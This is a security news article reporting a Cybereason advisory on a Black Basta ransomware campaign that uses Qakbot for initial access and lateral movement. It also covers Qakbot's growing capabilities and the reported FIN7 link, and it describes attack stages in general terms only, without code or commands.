The ransomware group is using Qakbot to make the initial point of entry before moving laterally within an organization’s network.

The Black Basta ransomware group is using Qakbot malware — also known as QBot or Pinkslipbot — to perpetrate an aggressive and widespread campaign using an .IMG file as the initial compromise vector.

More than 10 different customers have been targeted by the campaign in the last two weeks, mostly focused on companies based in the US.

According to a threat advisory posted by the Cybereason Global SOC (GSOC) on Nov. 23, the infections begin with either a spam or phishing email, which contain malicious URL links, with Black Basta deploying Qakbot as the primary method to maintain a presence on victims’ networks.

"In this latest campaign, the Black Basta ransomware gang is using Qakbot malware to create an initial point of entry and move laterally within an organization's network," the report noted.

While Qakbot started out as a banking Trojan, different groups have augmented its capabilities with additional modules, using it as an infostealer, a backdoor, and a downloader. Qakbot has also recently switched up its method of delivering its malicious payload — from JavaScript to VBS.

"We also observed the threat actor using Cobalt Strike during the compromise to gain remote access to the domain controller," the research team noted. "Finally, ransomware was deployed, and the attacker then disabled security mechanisms, such as EDR and antivirus programs."

The report singles out the swiftness with which the attacks are taking place, with ransomware deployed in less than half a day after obtaining domain administrator privileges in under two hours.

In more than one attack, the GSOC team observed the threat actor disabling DNS services, locking the victim out of the network, and making recovery more difficult.

"Given all of these observations, we recommend that security and detection teams keep an eye out for this campaign, since it can quickly lead to severe IT infrastructure damage," the report noted.

The report encourages organizations to identify and block malicious network connections, reset Active Directory access, engage incidence response, and cleanse compromised machines, which includes isolating and reimaging all infected machines.

**Qakbot Ramps Up Operations, Adding Capabilities**

The Qakbot group has recently ramped up its operations, infecting systems, installing attack frameworks, and selling access to other groups, including Black Basta.

In September, it resumed expanding its access-as-a-service network, successfully compromising hundreds of companies with common second-stage payloads, including Emotet malware and two popular attack platforms.

In June Qakbot operators were observed using DLL sideloading to deliver malware, a technique that places legitimate and malicious files together in a common directory to avoid detection.

**Black Basta Backed by FIN7**

Black Basta, one of this year's most prolific ransomware families, offers its ransomware-as-a-service (RaaS) offering in various underground forums, which means multiple operators have access to Black Basta in their toolset, making attribution difficult.

The group has been active since at least February, although it was only discovered two months later targeting VMware ESXi virtual machines running on enterprise Linux servers, encrypting files inside a targeted volumes folder. The group has targeted English-speaking countries on a global scale.

Evidence has recently emerged that FIN7, a financially motivated cybercrime organization estimated to have stolen well over $1.2 billion since surfacing in 2012, is behind Black Basta, according to researchers at SentinelOne.

Tag

#vmware